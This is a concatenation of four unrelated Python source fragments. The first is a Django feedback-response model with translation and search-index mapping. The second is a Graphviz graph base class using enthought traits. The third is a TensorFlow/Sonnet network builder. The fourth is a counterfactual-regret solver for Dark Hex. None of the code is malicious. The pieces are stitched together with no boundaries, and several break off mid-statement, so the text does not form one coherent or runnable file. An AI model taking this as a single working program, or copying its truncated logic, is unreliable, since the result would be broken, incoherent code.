Note:: This happens in a celery task, so feel free to do what you need to do here. """ # If the text is in English, we copy it over and we're # done. We do this regardless of whether auto-translation is # enabled or not for this product. if self.locale == 'en-US': self.translated_description = self.description self.save() return [] try: prod = Product.objects.get(db_name=self.product) system = prod.translation_system except Product.DoesNotExist: # If the product doesn't exist, then I don't know what's # going on, but we shouldn't create any translation jobs return [] if not system: # If this product isn't set up for translation, don't # translate it. return [] try: # See if this text has been translated already--if so, use # the most recent translation. existing_obj = ( Response.objects .filter(description=self.description) .exclude(translated_description__isnull=True) .exclude(translated_description=u'') .latest('id')) self.translated_description = existing_obj.translated_description self.save() return [] except Response.DoesNotExist: pass return [ # key, system, src language, src field, dst language, dst field (compose_key(self), system, self.locale, 'description', u'en-US', 'translated_description') ] @classmethod def get_export_keys(cls, confidential=False): """Returns set of keys that are interesting for export Some parts of the Response aren't very interesting. This lets us explicitly state what is available for export. Note: This returns the name of *properties* of Response which aren't all database fields. Some of them are finessed. 
:arg confidential: Whether or not to include confidential data """ keys = [ 'id', 'created', 'sentiment', 'description', 'translated_description', 'product', 'channel', 'version', 'locale_name', 'manufacturer', 'device', 'platform', ] if confidential: keys.extend([ 'url', 'country_name', 'user_email', ]) return keys def save(self, *args, **kwargs): self.description = self.description.strip()[:TRUNCATE_LENGTH] super(Response, self).save(*args, **kwargs) @property def url_domain(self): """Returns the domain part of a url""" return get_domain(self.url) @property def user_email(self): """Associated email address or u''""" if self.responseemail_set.count() > 0: return self.responseemail_set.all()[0].email return u'' @property def sentiment(self): if self.happy: return _(u'Happy') return _(u'Sad') @property def truncated_description(self): """Shorten feedback for list display etc.""" return smart_truncate(self.description, length=70) @property def locale_name(self, native=False): """Convert a locale code into a human readable locale name""" locale = self.locale if locale in product_details.languages: display_locale = 'native' if native else 'English' return product_details.languages[locale][display_locale] return locale @property def country_name(self, native=False): """Convert a country code into a human readable country name""" country = self.country if country in CODE_TO_COUNTRY: display_locale = 'native' if native else 'English' return CODE_TO_COUNTRY[country][display_locale] return country @classmethod def get_mapping_type(self): return ResponseMappingType @classmethod def infer_product(cls, platform): if platform == u'Firefox OS': return u'Firefox OS' elif platform == u'Android': return u'Firefox for Android' elif platform in (u'', u'Unknown'): return u'' return u'Firefox' @register_mapping_type class ResponseMappingType(FjordMappingType, Indexable): @classmethod def get_model(cls): return Response @classmethod def get_mapping(cls): return { 'id': integer_type(), 
'prodchan': keyword_type(), 'happy': boolean_type(), 'url': keyword_type(), 'url_domain': keyword_type(), 'has_email': boolean_type(), 'description': text_type(), 'description_bigrams': keyword_type(), 'description_terms': terms_type(), 'user_agent': keyword_type(), 'product': keyword_type(), 'channel': keyword_type(), 'version': keyword_type(), 'browser': keyword_type(), 'browser_version': keyword_type(), 'platform': keyword_type(), 'locale': keyword_type(), 'country': keyword_type(), 'device': keyword_type(), 'manufacturer': keyword_type(), 'created': date_type() } @classmethod def extract_document(cls, obj_id, obj=None): if obj is None: obj = cls.get_model().objects.get(pk=obj_id) def empty_to_unknown(text): return u'Unknown' if text == u'' else text doc = { 'id': obj.id, 'prodchan': obj.prodchan, 'happy': obj.happy, 'url': obj.url, 'url_domain': obj.url_domain, 'has_email': bool(obj.user_email), 'description': obj.description, 'description_terms': obj.description, 'user_agent': obj.user_agent, 'product': obj.product, 'channel': obj.channel, 'version': obj.version, 'browser': obj.browser, 'browser_version': obj.browser_version, 'platform': obj.platform, 'locale': obj.locale, 'country': obj.country, 'device': obj.device, 'manufacturer': obj.manufacturer, 'created': obj.created, } # We only compute bigrams for english because the analysis # uses English stopwords, stemmers, ... if obj.locale.startswith(u'en') and obj.description: bigrams = compute_grams(obj.description) doc['description_bigrams'] = bigrams return doc @property def truncated_description(self): """Shorten feedback for dashboard view.""" return smart_truncate(self.description, length=500) @classmethod def get_products(cls): """Returns a list of all products This is cached. 
""" key = 'feedback:response_products1' products = cache.get(key) if products is not None: return products facet = cls.search().facet('product').facet_counts() products = [prod['term'] for prod in facet['product']] cache.add(key, products) return products @classmethod def get_indexable(cls): return super(ResponseMappingType, cls).get_indexable().reverse() class ResponseEmail(ModelBase): """Holds email addresses related to Responses.""" opinion = models.ForeignKey(Response) email = models.EmailField() class NoNullsCharField(serializers.CharField): """Further restricts CharField so it doesn't accept nulls DRF lets CharFields take nulls which is not what I want. This raises a ValidationError if the value is a null. """ def from_native(self, value): if value is None: raise ValidationError('Value cannot be null') return super(NoNullsCharField, self).from_native(value) class ResponseSerializer(serializers.Serializer): """This handles incoming feedback This handles responses as well as the additional data for response emails. """ happy = serializers.BooleanField(required=True) url = serializers.URLField(required=False, default=u'') description = serializers.CharField(required=True) # Note: API clients don't provide a user_agent, so we skip that and # browser since those don't make sense. # product, channel, version, locale, platform product = NoNullsCharField(max_length=20, required=True) channel = NoNullsCharField(max_length=30, required=False, default=u'') version = NoNullsCharField(max_length=30, required=False, default=u'') locale = NoNullsCharField(max_length=8, required=False, default=u'') platform = NoNullsCharField(max_length=30, required=False, default=u'') country = NoNullsCharField(max_length=4, required=False, default=u'') # device
#------------------------------------------------------------------------------ # Copyright (c) 2009 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. #------------------------------------------------------------------------------ """ Defines a base class for many graphs. 
""" #------------------------------------------------------------------------------ # Imports: #------------------------------------------------------------------------------ import os import logging import tempfile import subprocess from enthought.traits.api import \ HasTraits, Str, List, Instance, Bool, Property, Constant, Button, \ ReadOnly, Dict, TraitListEvent, Int, Enum, on_trait_change from enthought.enable.api \ import Viewport, Container from enthought.enable.tools.api \ import ViewportPanTool, ViewportZoomTool from dot2tex.dotparsing import find_graphviz from node \ import Node from edge \ import Edge from common \ import id_trait, Alias import godot #from util import Serializable FORMATS = ['dot', 'canon', 'cmap', 'cmapx', 'cmapx_np', 'dia', 'fig', 'gd', 'gd2', 'gif', 'hpgl', 'imap', 'imap_np', 'ismap', 'jpe', 'jpeg', 'jpg', 'mif', 'mp', 'pcl', 'pdf', 'pic', 'plain', 'plain-ext', 'png', 'ps', 'ps2', 'svg', 'svgz', 'vml', 'vmlz', 'vrml', 'vtx', 'wbmp', 'xdot', 'xlib', 'bmp', 'eps', 'gtk', 'ico', 'tga', 'tiff'] RENDERERS = ['cairo', 'gd'] FORMATTERS = ['cairo', 'gd', 'gdk_pixbuf'] logger = logging.getLogger(__name__) #------------------------------------------------------------------------------ # "BaseGraph" class: #------------------------------------------------------------------------------ class BaseGraph ( HasTraits ): """ Defines a representation of a graph in Graphviz's dot language """ #-------------------------------------------------------------------------- # Trait definitions. #-------------------------------------------------------------------------- # Optional unique identifier. ID = id_trait # Synonym for ID. name = Alias("ID", desc="synonym for ID") # Used by InstanceEditor # Main graph nodes. nodes = List( Instance(Node) ) # Map if node IDs to node objects. # id_node_map = Dict # Graph edges. edges = List(Instance(Edge)) # Separate layout regions. 
subgraphs = List(Instance("godot.subgraph.Subgraph")) # Clusters are encoded as subgraphs whose names have the prefix 'cluster'. clusters = List(Instance("godot.cluster.Cluster")) # Node from which new nodes are cloned. default_node = Instance(Node) # Edge from which new edges are cloned. default_edge = Instance(Edge) # Graph from which new subgraphs are cloned. default_graph = Instance(HasTraits) # Level of the graph in the subgraph hierarchy. # level = Int(0, desc="level in the subgraph hierarchy") # Padding to use for pretty string output. padding = Str(" ", desc="padding for pretty printing") # A dictionary containing the Graphviz executable names as keys # and their paths as values. See the trait initialiser. programs = Dict(desc="names and paths of Graphviz executables") # The Graphviz layout program program = Enum("dot", "circo", "neato", "twopi", "fdp", desc="layout program used by Graphviz") # Format for writing to file. format = Enum(FORMATS, desc="format used when writing to file") # Use Graphviz to arrange all graph components. arrange = Button("Arrange All") # Parses the Xdot attributes for all graph components. redraw = Button("Redraw Canvas") #-------------------------------------------------------------------------- # Enable trait definitions. #-------------------------------------------------------------------------- # Container of graph components. component = Instance(Container, desc="container of graph components.") # A view into a sub-region of the canvas. vp = Instance(Viewport, desc="a view of a sub-region of the canvas") #-------------------------------------------------------------------------- # Xdot trait definitions: #-------------------------------------------------------------------------- # For a given graph object, one will typically a draw directive before the # label directive. For example, for a node, one would first use the # commands in _draw_ followed by the commands in _ldraw_. 
_draw_ = Str(desc="xdot drawing directive") # Label draw directive. _ldraw_ = Str(desc="xdot label drawing directive") #-------------------------------------------------------------------------- # "object" interface: #-------------------------------------------------------------------------- # def __init__(self, **traits): # """ Initialises a new BaseGraph instance. # """ # super(BaseGraph, self).__init__(**traits) # # # Automatically creates all the methods enabling the saving # # of output in any of the supported formats. # for frmt in FORMATS: # self.__setattr__('save_'+frmt, # lambda flo, f=frmt, prog=self.program: \ # flo.write( self.create(format=f, prog=prog) )) # f = self.__dict__['save_'+frmt] # f.__doc__ = '''Refer to the docstring accompanying the 'create' # method for more information.''' def __len__(self): """ Return the order of the graph when requested by len(). @rtype: number @return: Size of the graph. """ return len(self.nodes) def __iter__(self): """ Return a iterator passing through all nodes in the graph. @rtype: iterator @return: Iterator passing through all nodes in the graph. """ for each in self.nodes: yield each def __getitem__(self, node): """ Return a iterator passing through all neighbours of the given node. @rtype: iterator @return: Iterator passing through all neighbours of the given node. """ for each_edge in self.edges: if (each_edge.tail_node == node) or (each_edge.head_node == node): yield each_edge def __str__(self): """ Returns a string representation of the graph in dot language. It will return the graph and all its subelements in string form. """ s = "" padding = self.padding if self.ID: s += "%s {\n" % self.ID else: s += "{\n" # Traits to be included in string output have 'graphviz' metadata. for trait_name, trait in self.traits(graphviz=True).iteritems(): # Get the value of the trait for comparison with the default. value = getattr(self, trait_name) # Only print attribute value pairs if not defaulted. 
# FIXME: Alias/Synced traits default to None. if ( value != trait.default ) and ( trait.default is not None ): if isinstance( value, basestring ): # Add double quotes to the value if it is a string. valstr = '"%s"' % value else: valstr = str(value) s += "%s%s=%s;\n" % ( padding, trait_name, valstr ) def prepend_padding(s): return "\n".join( [padding + line for line in s.splitlines()] ) for node in self.nodes: s += "%s%s\n" % ( padding, str(node) ) for edge in self.edges: s += "%s%s\n" % ( padding, str(edge) ) for subgraph in self.subgraphs: s += prepend_padding( str( subgraph ) ) + "\n" for cluster in self.clusters: s += prepend_padding( str( cluster ) ) + "\n" s += "}" return s #-------------------------------------------------------------------------- # Trait initialisers: #-------------------------------------------------------------------------- def _default_node_default(self): """ Trait initialiser. """ return Node("default") def _default_edge_default(self): """ Trait initialiser. """ return Edge("tail", "head") def _default_graph_default(self): """ Trait initialiser. """ return godot.cluster.Cluster(ID="cluster_default") def _programs_default(self): """ Trait initaliser. """ progs = find_graphviz() if progs is None: logger.warning("GraphViz's executables not found") return {} else: return progs def _component_default(self): """ Trait initialiser. """ return Container(draw_axes=True, fit_window=False, auto_size=True) def _vp_default(self): """ Trait initialiser. """ vp = Viewport(component=self.component) vp.enable_zoom=True vp.view_position = [-5, -5] vp.tools.append(ViewportPanTool(vp)) return vp #-------------------------------------------------------------------------- # Public interface: #-------------------------------------------------------------------------- def save_dot(self, flo, prog=None): """ Writes a graph to a file. 
Given a file like object 'flo' it will truncate it and write a representation of the graph defined by the dot object and in the format specified. The format 'raw' is used to dump the string representation of the Dot object, without further processing. The output can be processed by any of graphviz tools, defined in 'prog', which defaults to 'dot'. """ flo.write( str(self) ) def save_xdot(self, flo, prog=None): prog = self.program if prog is None else prog flo.write( self.create(prog, "xdot") ) def save_png(self, flo, prog=None): prog = self.program if prog is None else prog flo.write( self.create(prog, "png") ) @classmethod def load_dot(cls, flo): parser = godot.dot_data_parser.GodotDataParser() return parser.parse_dot_file(flo) @classmethod def load_xdot(cls, flo): parser = godot.dot_data_parser.GodotDataParser() return parser.parse_dot_file(flo) def create(self, prog=None, format=None): """ Creates and returns a representation of the graph using the Graphviz layout program given by 'prog', according to the given format. Writes the graph to a temporary dot file and processes it with the program given by 'prog' (which defaults to 'dot'), reading the output and returning it as a string if the operation is successful. On failure None is returned. """ prog = self.program if prog is None else prog format = self.format if format
import tensorflow as tf
from tensorflow_probability import distributions as tfd

from .AbstractModule import AbstractModule
from ..utils.argo_utils import load_sonnet_module


class GeneralSonnetNetwork(AbstractModule):
    """Intermediate class to build a customizable Network (to be used as a
    building block from an ArgoNetwork)."""

    def __init__(self, activation, default_weights_init, default_bias_init,
                 default_weights_reg, default_bias_reg, network_architecture,
                 stochastic_defaults=None, network_str="", is_training=False,
                 # seed=None,
                 name='AbstractSonnetNetwork'):
        """Store the architecture and build the per-module defaults tables.

        Args:
            activation (callable): activation applied after modules whose
                tuple sets the activation flag.
            default_weights_init: default initializer for 'w' of snt modules
                (also `kernel_initializer` for tf layers).
            default_bias_init: default initializer for 'b' of snt modules.
            default_weights_reg: default regularizer for 'w' of snt modules.
            default_bias_reg: default regularizer for 'b' of snt modules.
            network_architecture (list): a list of tuples
                (sntModule, kwargs, bool_activate) or
                (sntModule, kwargs, bool_activate, decorators), e.g.
                [("Linear", {"output_size": 100}, 1),
                 ("Linear", {"output_size": 10}, 1),
                 ("GaussianDiagonal", {"size": 20, "minimal_covariance": 0}, 0)]
            stochastic_defaults (dict): optional defaults for stochastic
                layers; may carry "covariance_parameterization" or
                "concentration_parameterization".
            network_str (str): optional tag for this network, used to set
                specific collections for activity/contractive regularizers.
            is_training: bool (or placeholder) forwarded to modules with
                train-time behaviour (BatchNorm, Dropout, custom blocks).
            name (str): name of the Module.
        """
        super().__init__(name=name)

        self._network_architecture = network_architecture
        self._network_str = network_str
        # self._is_training = is_training
        # self._seed = seed

        covariance_parameterization = None
        concentration_parameterization = None
        if stochastic_defaults:
            try:
                # what to do for multiple sampling layers, now I sample once!
                # self.n_z_samples = stochastic_defaults["samples"]
                if "covariance_parameterization" in stochastic_defaults:
                    covariance_parameterization = stochastic_defaults["covariance_parameterization"]
                elif "concentration_parameterization" in stochastic_defaults:
                    concentration_parameterization = stochastic_defaults["concentration_parameterization"]
            except KeyError as e:
                print("need to pass all the stochastic_defaults, missing keys")
                raise KeyError("need to pass all the stochastic_defaults, missing keys") from e

        # SET DEFAULTS FOR NETWORK CREATION
        # activation function
        self._activation = activation

        # SET DEFAULT PARAMETERS FOR SONNET MODULES
        # these are default parameters for the snt modules; "potentially" they
        # could be overwritten by the properties in the specific modules of
        # "network_architecture"
        self._default_modules_kwargs = {}
        self._default_modules_kwargs['common'] = {
            "initializers": {},
            "regularizers": {}
        }
        # Only register defaults the caller actually supplied, so a None does
        # not clobber a sonnet module's own default.
        if default_weights_init:
            self._default_modules_kwargs['common']["initializers"]['w'] = default_weights_init
        if default_bias_init:
            self._default_modules_kwargs['common']["initializers"]['b'] = default_bias_init
        if default_weights_reg:
            self._default_modules_kwargs['common']["regularizers"]['w'] = default_weights_reg
        if default_bias_reg:
            self._default_modules_kwargs['common']["regularizers"]['b'] = default_bias_reg

        self._default_modules_kwargs['BatchFlatten'] = {}
        self._default_modules_kwargs['BatchReshape'] = {}
        self._default_modules_kwargs['Sigmoid'] = {}
        self._default_modules_kwargs['Tanh'] = {}
        self._default_modules_kwargs['Linear'] = {**self._default_modules_kwargs['common']}
        self._default_modules_kwargs['Concatenate'] = {"node_name": "y1h"}
        self._default_modules_kwargs['Identity'] = {}

        self._default_modules_kwargs['Conv2D'] = {
            **self._default_modules_kwargs['Linear'],
            "kernel_shape": (3, 3),
            "stride": (1, 1),
            "padding": 'SAME'
        }
        self._default_modules_kwargs['Conv2DTranspose'] = {
            **self._default_modules_kwargs['Linear'],
            "kernel_shape": (3, 3),
            "stride": (1, 1),
            "padding": 'SAME'
        }

        self._default_modules_kwargs['LinearWN'] = {
            **self._default_modules_kwargs['Linear'],
            "use_weight_norm": True
        }
        # setting default values for the initializers for weight norm
        self._default_modules_kwargs['LinearWN']["initializers"] = {
            'v': tf.random_normal_initializer(0, 0.05),
            'b': default_bias_init,
            'g': default_bias_init
        }

        self._default_modules_kwargs['Conv2DWN'] = {
            **self._default_modules_kwargs['Conv2D'],
            "use_weight_norm": True
        }
        # setting default values for the initializers for weight norm
        self._default_modules_kwargs['Conv2DWN']["initializers"] = {
            'v': tf.random_normal_initializer(0, 0.05),
            'b': default_bias_init,
            'g': default_bias_init
        }

        # custom blocks take the activation and the training flag directly
        self._default_modules_kwargs['custom'] = {
            **self._default_modules_kwargs['common'],
            "activation": self._activation,
            "is_training": is_training
        }
        self._default_modules_kwargs['ResUnit'] = {**self._default_modules_kwargs['custom']}
        self._default_modules_kwargs['ResNet18'] = {**self._default_modules_kwargs['custom']}
        self._default_modules_kwargs['VGGBlock'] = {**self._default_modules_kwargs['custom']}
        self._default_modules_kwargs['ConvDec'] = {**self._default_modules_kwargs['custom']}
        self._default_modules_kwargs['ResEnc'] = {**self._default_modules_kwargs['custom']}
        self._default_modules_kwargs['ResDec'] = {**self._default_modules_kwargs['custom']}

        self._default_modules_kwargs['ConvNet2D'] = {
            **self._default_modules_kwargs['Linear'],
            "kernel_shapes": [(3, 3)],
            "strides": [2, 2],
            "paddings": 'SAME',
            "activation": self._activation,
            "activate_final": False,
            "normalize_final": False
        }
        self._default_modules_kwargs['ConvNet2DTranspose'] = {
            **self._default_modules_kwargs['ConvNet2D']
        }

        self._default_modules_kwargs['MaxPooling2D'] = {"pool_size": (2, 2), "strides": 2}
        self._default_modules_kwargs['RandomUniform'] = {"shape": 20, "minval": -1, "maxval": 1}
        self._default_modules_kwargs['RandomGaussian'] = {"shape": 20}
        self._default_modules_kwargs['AveragePooling2D'] = {"pool_size": (2, 2), "strides": 2}

        self._default_modules_kwargs['Dropout'] = {
            # "seed" : self._seed,
            "rate": 0.5,  # tf.layers.dropout
            # "is_training" : self._is_training
            "dropout_flag": is_training
        }
        self._default_modules_kwargs['BatchNorm'] = {"is_training": is_training}

        self._default_modules_kwargs['GaussianDiagonal'] = {
            **self._default_modules_kwargs['common'],
            # TODO check the default value
            "minimal_covariance": 0.,
            "covariance_parameterization": covariance_parameterization,
            # This would be desirable, but at the moment it does not work
            # "module_tuple" : ("Linear", {})
        }
        self._default_modules_kwargs['GaussianDiagonalZeroOne'] = {
            **self._default_modules_kwargs['GaussianDiagonal'],
            "module_tuple": ("Linear", {})
        }
        self._default_modules_kwargs['GaussianDiagonalPlusMinusOne'] = {
            **self._default_modules_kwargs['GaussianDiagonal'],
            "module_tuple": ("Linear", {})
        }
        self._default_modules_kwargs['Gaussian'] = {
            **self._default_modules_kwargs['common'],
            # TODO check the default value
            "minimal_covariance": 0.,
            "covariance_parameterization": covariance_parameterization,
            # This would be desirable, but at the moment it does not work
            # "module_tuple" : ("Linear", {})
        }
        self._default_modules_kwargs['vonMisesFisher'] = {
            **self._default_modules_kwargs['common'],
            # TODO check the default value
            # see https://github.com/tensorflow/probability/blob/v0.9.0/tensorflow_probability/python/distributions/von_mises_fisher.py
            "minimal_concentration": 1,
            "concentration_parameterization": concentration_parameterization,
            # This would be desirable, but at the moment it does not work
            # "module_tuple" : ("Linear", {})
        }
        self._default_modules_kwargs['LogisticDiagonalZeroOne'] = {
            **self._default_modules_kwargs['GaussianDiagonalZeroOne'],
        }
        self._default_modules_kwargs['LogisticDiagonalPlusMinusOne'] = {
            **self._default_modules_kwargs['GaussianDiagonalPlusMinusOne'],
        }
        self._default_modules_kwargs['LogitNormalDiagonal'] = {
            **self._default_modules_kwargs['GaussianDiagonalZeroOne'],
            "clip_value": 0.0001
        }
        self._default_modules_kwargs['LogitNormalDiagonalPlusMinusOne'] = {
            **self._default_modules_kwargs['GaussianDiagonalPlusMinusOne'],
            "clip_value": 0.0001
        }
        self._default_modules_kwargs['Bernoulli'] = {
            **self._default_modules_kwargs['common'],
            "clip_value": 0.0001
        }
        self._default_modules_kwargs['BernoulliPlusMinusOne'] = {
            **self._default_modules_kwargs['common'],
            "clip_value": 0.0001
        }
        self._default_modules_kwargs['CIFAR10TutorialNetwork'] = {}

        # these are default parameters for the tf layers; "potentially" they
        # could be overwritten by the properties in the specific layers of
        # "network_architecture"
        self._default_layers_kwargs = {}
        self._default_layers_kwargs['common'] = {
            "kernel_initializer": default_weights_init,
            "bias_initializer": default_bias_init,
            "kernel_regularizer": default_weights_reg,
            "bias_regularizer": default_bias_reg,
        }
        self._default_layers_kwargs['flatten'] = {}
        self._default_layers_kwargs['dense'] = {
            **self._default_layers_kwargs['common'],
            "activity_regularizer": None,
            "kernel_constraint": None,
            "bias_constraint": None
        }
        self._default_layers_kwargs['conv2d'] = {
            **self._default_layers_kwargs['dense'],
            # filters,
            # kernel_size,
            "strides": (1, 1),
            "padding": 'valid'
            # "data_format" : 'channels_last',
            # "dilation_rate" : (1, 1)
        }
        self._default_layers_kwargs['max_pooling2d'] = {"pool_size": (2, 2), "strides": 2}
        self._default_layers_kwargs['batch_normalization'] = {}

    def _build(self, inputs):
        """Constructs the graph.

        Args:
            inputs: `tf.Tensor` input to which to attach the network.

        Returns:
            `tf.Tensor` output of the last layer if it is deterministic,
            otherwise the `tfd.Distribution` produced by the last
            (stochastic) layer.

        Raises:
            Exception: on a malformed module tuple, an unknown module/layer
                name, or an activation flag set on a stochastic layer.
        """
        print("Parsing " + self.module_name + " network...")

        net = inputs
        self._modules = []
        self._layers = []
        # Bug fix: initialize before the loop so that naming the "features"
        # node below does not raise NameError when the architecture is empty.
        last_node_before_logits = net

        for module_tuple in self._network_architecture:
            # A stochastic layer outputs a distribution; sample once to feed
            # the next module.
            if isinstance(net, tfd.Distribution):
                # net = net.sample(self.n_z_samples)
                net = net.sample()

            if len(module_tuple) == 3:
                module_name, module_kwargs, bool_activation = module_tuple
                # no decorators
                decorators = []
            elif len(module_tuple) == 4:
                module_name, module_kwargs, bool_activation, decorators = module_tuple
                # make a copy, so that I can pop safely
                decorators = decorators.copy()
            else:
                raise Exception("The length of the module_tuple should be 3 or 4: " + str(module_tuple))

            # architecture-specific kwargs override the defaults table
            if module_name in self._default_modules_kwargs:
                kwargs = {**self._default_modules_kwargs[module_name], **module_kwargs}
            elif module_name in self._default_layers_kwargs:
                kwargs = {**self._default_layers_kwargs[module_name], **module_kwargs}
            else:
                raise Exception(module_name + " is neither a sonnet module nor a tf layer. Hint: check if you have set the self._default_modules_kwargs or self._default_layers_kwargs")

            # add reference for the contractive regularizers if needed; this
            # works both for stochastic layers and for regular layers plus a
            # ContractiveRegularizer decorator
            self.add_reference_for_contractive_regularizers(kwargs, inputs)

            # load decorators
            decorator_modules = []
            while len(decorators) > 0:
                decorator_name = decorators.pop(0)
                decorator = load_sonnet_module(decorator_name, kwargs)  # (sntmodule)
                decorator_modules.append(decorator)

            # linear = decorator(args)(snt.Linear)(flat)
            if len(decorator_modules) > 0:
                # only load the class of the module, without instantiation
                sntmodule = load_sonnet_module(module_name, kwargs, instantiate=False)
                # apply decorators innermost-last: decorator(snt.Linear)(kwargs)(net)
                while len(decorator_modules) > 0:
                    decorator = decorator_modules.pop(-1)
                    sntmodule = decorator(sntmodule)(kwargs)
            else:
                # no decorators, load the module
                sntmodule = load_sonnet_module(module_name, kwargs)

            # remember the input of the module that produces the final output:
            # after the loop this is the node tagged "features"
            last_node_before_logits = net
            net = sntmodule(net)
            self._modules.append(sntmodule)
            # at this point net is expected to be either a tensor (logits) or
            # a tf.Distribution
            self._layers.append(net)

            if bool_activation:
                if isinstance(net, tfd.Distribution):
                    raise Exception("cannot apply activation to a tf.Distribution, check network architecture!")
                net = self._activation(net)

        # name the last layer before logits (or distribution)
        last_node_before_logits = tf.identity(last_node_before_logits, name="features")

        # this will be either a tensor or a distribution
        output = net
        return output

    def add_reference_for_contractive_regularizers(self, kwargs, reference_node):
        """If kwargs carries a 'contractive_regularizer' spec (name, kwargs),
        extend it in place with the reference node and this network's tag so
        the regularizer is built against the right input and collection."""
        if "contractive_regularizer" in kwargs and kwargs["contractive_regularizer"] is not None:
            reg_name, reg_kwargs = kwargs["contractive_regularizer"]
            kwargs["contractive_regularizer"] = (reg_name, reg_kwargs, reference_node, self._network_str)

    # TODO-ARGO2: a long commented-out draft of `_create_stochastic_layer`
    # (stochastic layer resolved via importlib) used to live here; removed as
    # dead code — recover from version control if ever needed.
<gh_stars>1-10
# NOTE(review): FSICFR (Forward-Sampled Iterative CFR) for Dark Hex.
# `get_infoset` is used below but neither defined nor imported in this
# fragment — presumably defined elsewhere in this file; verify.
import numpy as np
from Projects.base.util.print_tools import seq_to_str
from Projects.base.game.darkHex import DarkHex
from Projects.base.game.hex import Hex, pieces
from tqdm import tqdm
from copy import deepcopy, copy
from collections import defaultdict
import pickle

class Node:
    """One information-set node of the game DAG: board view of one player,
    regret/strategy accumulators and graph links (children/parents)."""
    def __init__(self, board, move_history, player, h, turn_num) -> None:
        self.player = player
        self.num_actions = len(board)
        self.move_history = move_history
        self.board = deepcopy(board)
        self.h = h  # number of hidden opponent stones from this player's view
        self.turn_num = turn_num
        self.infoSet = get_infoset(self.board, self.h)
        self.strategy = np.zeros(self.num_actions)
        self.regretSum = np.zeros(self.num_actions)
        self.strategySum = np.zeros(self.num_actions)
        self.regrets = np.zeros(self.num_actions)
        self.T = 0          # cumulative visit count over all iterations
        self.u = 0          # node utility computed in the backward pass
        self.pSum1 = 1      # reach-probability mass for Black
        self.pSum2 = 1      # reach-probability mass for White
        self.visits = 1
        self.pos_actions = [i for i, x in enumerate(self.board) if x == pieces.kEmpty]
        self.is_terminal = False
        self.children = []
        self.parents = []

    def getStrategy(self):
        """Regret matching: current strategy proportional to positive regrets
        (uniform when no positive regret); also accumulates strategySum
        weighted by this player's reach probability."""
        normalizingSum = 0
        for a in self.pos_actions:
            self.strategy[a] = max(self.regretSum[a], 0)
            # * regret matching algorithm here.
            # * just use the positive regrets.
            normalizingSum += self.strategy[a]
        # Add all the positive regrets -> normSum
        for a in self.pos_actions:
            if normalizingSum > 0:
                # if normalizing sum was positive all the action probs will
                # be devided by normSum
                self.strategy[a] /= normalizingSum
            else:
                # otherwise all actions are equaprobable (random)
                self.strategy[a] = 1.0 / len(self.pos_actions)
            self.strategySum[a] += self.strategy[a] * (self.pSum1 if \
                self.player == pieces.kBlack else self.pSum2)
            # * summing up all the action probabilities
            # ? what is realizationWeight again
        return self.strategy

    def getAverageStrategy(self):
        """Average strategy over iterations (normalized strategySum); this is
        the CFR output policy. NOTE: normalizes strategySum in place."""
        normalizingSum = 0
        for a in self.pos_actions:
            normalizingSum += self.strategySum[a]
        # summing up all the action probs using strategySum
        # ? why strategySum
        for a in self.pos_actions:
            if normalizingSum > 0:
                self.strategySum[a] /= normalizingSum
            else:
                self.strategySum[a] = 1 / len(self.pos_actions)
        return self.strategySum

    def update_infoset(self):
        # Recompute the information-set key after the board changed.
        self.infoSet = get_infoset(self.board, self.h)

    def __str__(self):
        return "{}:\t{}".format(self.infoSet, seq_to_str(self.getAverageStrategy(), spacing=' '))

class FSICFR:
    """Fixed-Strategy Iteration CFR over a topologically ordered DAG of
    Dark Hex information sets."""
    def __init__(self, num_rows=3, num_cols=3) -> None:
        self.num_rows = num_rows
        self.num_cols = num_cols
        self.num_actions = num_cols * num_rows
        self.nodes, self.nodes_dict = self.__init_board_topSorted()

    def train(self, num_of_iterations) -> None:
        """Run FSICFR: a forward pass propagating visit counts and reach
        probabilities down the DAG, then a backward pass propagating
        utilities and updating regrets.

        NOTE(review): original statement grouping was reconstructed from a
        collapsed source; the regret update is placed inside the non-terminal
        branch (terminal nodes have no decisions) — confirm against the
        FSICFR pseudocode (Neller & Lanctot, p. 32).
        """
        for it in tqdm(range(num_of_iterations)):
            # --- forward pass (top-sorted order) ---
            for node in self.nodes:  # top-sorted nodes
                if node.visits == 0:
                    node.visits = 1
                    node.pSum1 = 1
                    node.pSum2 = 1
                rev_player = pieces.kBlack if node.player == pieces.kWhite else pieces.kWhite
                strategy = node.getStrategy()
                for a in node.pos_actions:  # for each possible move
                    # take action a on board
                    children = []
                    # * update the board with action a and add the new
                    # * board state to the -children- to traverse later.
                    new_board = self.__placeStone(node.board, a, node.player)
                    children.append(get_infoset(new_board, node.h))
                    if node.h > 0:
                        # the move may also hit a hidden stone: successor with
                        # one fewer hidden stone
                        new_board = self.__placeStone(node.board, a, rev_player)
                        children.append(get_infoset(new_board, node.h-1))
                    for infoset_c in children:
                        if infoset_c in self.nodes_dict:
                            # update visits
                            c = self.nodes_dict[infoset_c]
                            c.visits += node.visits
                            # update the rweights (reach probabilities):
                            # scaled by strategy[a] only for the acting player
                            c.pSum1 += (strategy[a] * node.pSum1 if node.player == pieces.kBlack else node.pSum1)
                            c.pSum2 += (strategy[a] * node.pSum2 if node.player == pieces.kWhite else node.pSum2)
                # endfor - pos_actions
            # endfor - nodes
            # --- backward pass (reverse top-sorted order) ---
            for node in self.nodes[::-1]:
                node.u = 0
                strategy = node.getStrategy()
                rev_player = pieces.kBlack if node.player == pieces.kWhite else pieces.kWhite
                game = Hex(BOARD_SIZE=[self.num_rows, self.num_cols], BOARD=node.board, verbose=False)
                if game._game_status() == node.player:
                    node.u = 1
                elif game._game_status() != pieces.kDraw:
                    node.u = -1
                else:
                    for a in range(self.num_actions):
